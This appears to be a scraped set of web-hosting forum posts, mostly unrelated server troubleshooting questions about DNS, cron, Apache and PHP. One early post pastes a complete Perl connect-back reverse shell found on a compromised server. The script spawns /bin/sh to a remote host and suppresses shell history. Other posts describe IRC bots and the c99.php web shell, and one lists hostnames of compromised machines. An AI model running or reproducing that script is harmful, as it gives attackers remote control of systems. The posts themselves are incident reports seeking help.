For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is a some sort of infection in it. What should I do next. The logs are attached in a n attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
Found a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007
";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]
";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.
is it related to dns issue?
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
I cant visit my website! <snipped> everytime I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I cant? Yesterday same thing but then couple hours later it worked I could visit hmlegends.com but i didnt do anything and now today same thing server not found! i cleaned my history everything and still server not found!
So what I did is used a proxy <snipped> and then it worked!
But then I dont use a proxy SERVER NOT FOUND! Its like my IP cant reach hmlegends.com
I dont know how to solve this?!?? It just says server not found!
But it looks like everyone else could access it!
Anyways im using Firefox 2 but then maybe i thought it was my browser so switched to 3 so currently on firefox 3
and no its not its something with my IP cuz when i use proxy i could go to my site
but point is i dont wanna use proxy i wanna use my IP to go to hmlegends.com
Also im using Dial Up Internet!
I use AOL Dialer to connect!
Aol Dialer 4.8.8.4
I have recently brought a VPS hosting package. At the moment I am going through the tutoritals on the net that I have researched before getting a VPS package to give me some understanding on what I need to do to securior the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
Of which is I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
I got a new BOX, i see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
how can i get 'cronjob' working?
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
while am installing some programs there is some problem in my php
PHP GD Module Not Found
how could i install it in SSH root?
After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:
I have found a irc bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.
The user of the files are nobody. Hence it is clear that the files were uploaded via url injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.
You should update all your web softwares to latest version so that they will include latest security patches. Also I will recommend you to enable mod_security in your server to prevent further hacks.
Let us know if you want this to be enabled.
Our Security Technician found yesterday a 200 user botnet on a hidden IRC server and was able to quickly email the compromised systems information (just hostname) to our abuse email. So today i spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised, we regulary email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are dedicated lines between 10MBPS to 1GBPS... I found a few hosting companies and will list them so they can be found by them:
lvps212-241-192-85.vps.webfusion.co.uk
wp056.webpack.hosteurope.de
wp097.webpack.hosteurope.de
wp049.webpack.hosteurope.de
wp055.webpack.hosteurope.de
m2.wrango.com - Dedicated Server with NetworkSolutions
server1.hostfree.com.br
My server use cPanel 10x
CentOS
how to fix this problem?
php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)
I just found a script on a customers account after some problems they were having, they mentioned injecting php code, that immediately threw up a red flag, when i took a look i found c99.php
I checked up and this seems to be the web equivalent of a rootkit.
Are there any legitimate reasons for this script? The customer is one of the strangest i've came accross because he had the lowest fraud score yet, used a Lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMcs security wise.. i dont want to post details as checks are still ongoing but it seems to be a problem with Language scripts and the customer was able to sign up on a monthly plan but Biannually... so no more invoices till 2009 ... strange, although wether innocently this was done or is a known security hole in WHMCS is not known yet.
after a day of crappy performance from one of my VPS accounts, I decided to start digging, and found eggdrop, and couple of other not so nice files in my /tmp directory.
I panicked, of course, and removed all traces of anything I could find that was bad, so I've unfortunately got no way to see how it happened, as far as I know (but I'm far from a security expert)
I need your help in shutting the system down to users. This is an HTTP/SSH/SMTP/POP3/IMAP server.
Tell me what you need to know and I will do my best to get it to you. Basically I'm just frustrated that I've been on it for 3 hours now.....wasting time because some SOB was bored....
How can I found the spammer on our server?
one of our customer trying to send mail with a PHP file! but I cannot found this account, can you help me to found this user?
I'll try to make this long story short, but this morning I logged into one of my servers and it showed a read-only filesystem, which I thought my server guys could fix easily. So I put in a ticket. 6 hours later, they tell me that they think the OS is corrupted and I need a new install. They give me KVM over IP so I can go in and 'do' things. I tried to log in as root and it wouldn't let me, so they finally booted in single mode and I can get in and such. When I try to su - root, it tells me that user root can't be found. I also tried to ftp into and out of the server with no luck. I really need this box back up. If not, I need to get all the accounts saved off so that I can build a new box. Everything is there, so I don't want to give up yet.
View 10 Replies View RelatedWhen I was a customer at hostgator, whenever a terminating error within php was displayed it would log in the parent directory in a file called "error_log".
I want this to happen now on our dedicated server. I've looked at my local apache error log and it doesn't appear to show the same info as hostgator's setup showed.
Can anyone tell me how to set that up?
I'm setting a local server on my network. Leopard 10.5.6
I went to mysql.com and installed the intel 32-bit version of mysql (package).
After install, i try to run mysqladmin command, but it returns command not found.
I search the location using
which mysql
nothing returns.
I find the install here:
/usr/local/mysql-5.1.34-osx10.5-x86/bin
even when i check the file and its there, running the command returns
mysqladmin: command not found
I have this setup on CPanel
php -q /home/host/public_html/clients/admin/cron.php
but I get this:
sh: -t: command not found
sh: -t: command not found
sh: -t: command not found
sh: -t: command not found
I am trying to access a temporary url on cPanel but I get a 404 Not Found error....
View 3 Replies View Relatedi have to Creat a new client in my Awstat / Plesk Panel ..
without domain
i just wanna test some programmers via the [url]..
but there is nothing open !!
i think mis-configuration of my Apache/httpd process inside
your VPS
[url]
[url]
i locate my httpd.conf file its were here
PHP Code:
[root@secure vb]# locate [url]
Im facing problem from last 48 hours when i try to access my site
www.yourdomain.com/forum
then it showing me error Page not found
Not Found
The requested URL /forum was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
and when i checked this forum folder through shell and cpanel then its there and when i try to access it through
[url]
then its working fine does any of you know whats the problem was plz help me my site was already closed from 48 hours God Bless you
any hints on the reason of "--with-mime-magic: not found" when compiling PHP?
FreeBSD 6.1
I just found the following KVM over IP device with 16 ports:
[url]
You can get it for 747 € ( plus VAT ) and it comes with 2 CPU cables. Each additional cable costs only 5.80 €. For 828 € you can manage 16 servers, 52 € per server.
to install these two but whm did not find them
html2ps
ps2pdf
Only found this,
Meta::Tool:s2Pdf
not sure if that is the proper one anyway.
Using perl 5.8.8 / centos 4.5
I have a problem trying to mount a network share.
Here is the full story: I have setup a WDS server running DHCP, DNS, WINS and WDS services on it.
After I succesfully boot the network image I try to mount a network share located on this server running "net use * IPofServer"
At this monent I reiceve System Error 67 has occured. The network name cannot be found.
I've tried "net use * NameOfServer" but still no luck. (net use z: or net use * don't matter in this case).
I though that since it could not resolve the name, I've installed a WINS server on the server but this client that I boot still cannot do the job.
Also not to forget the server is an Win 2k3 SP2 Active Directory one.
If I traceroute the server IP from the client it resolves the server name.
nslookup doesn't work since the network booted image is WinPE 2.0 which is Vista.
I've looked closely on internet for a way to solve this but all the solutions that I've found failed to work though.
On compiling apache module on Debian, i get error
phpize: command not found
I am new to debian, not sure how to install php-devel on debian.
The server have Plesk installed.
Quote:
# php -v
PHP 4.3.10-22 (cli) (built: Jun 30 2007 14:42:16)
Copyright (c) 1997-2004 The PHP Group
Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies
#
How do i install php-devel on the server?
Also let me know what is the command to list installed software on debian like "yum list" on RH.
after domain moved to new server we receive this email alert when cron job run (set under cpanel)
/bin/sh: GET: command not found